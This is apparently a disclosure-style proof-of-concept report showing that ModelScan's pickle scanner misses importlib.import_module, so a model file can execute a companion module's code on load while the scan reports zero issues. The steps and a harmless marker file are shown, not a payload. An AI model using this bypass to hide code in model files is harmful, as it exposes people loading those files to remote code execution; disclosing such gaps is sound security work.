| # ModelScan PickleUnsafeOpScan Bypass PoC | |
| ## Steps to Reproduce | |
| ```bash | |
| # 1. Scan with ModelScan | |
| modelscan -p model.bin | |
| # Output: Issues: 0, Errors: 0, Skipped: 0 | |
| # 2. Load the model | |
| python3 -c "import pickle; pickle.load(open('model.bin','rb'))" | |
| # 3. Check for RCE | |
| cat /tmp/modelscan_bypass.txt | |
| # Output: MODELSCAN_IMPORTLIB_BYPASS_SUCCESS | |
| ``` | |
| ## Technical Details | |
| ModelScan's PickleUnsafeOpScan uses a hardcoded blacklist of unsafe modules in `unsafe_globals`. The `importlib` module is NOT in this blacklist, allowing `importlib.import_module()` to be used in pickle payloads without detection. | |
| When the pickle is deserialized, `importlib.import_module('malice')` imports the companion `malice.py` file, executing arbitrary Python code at module import time. | |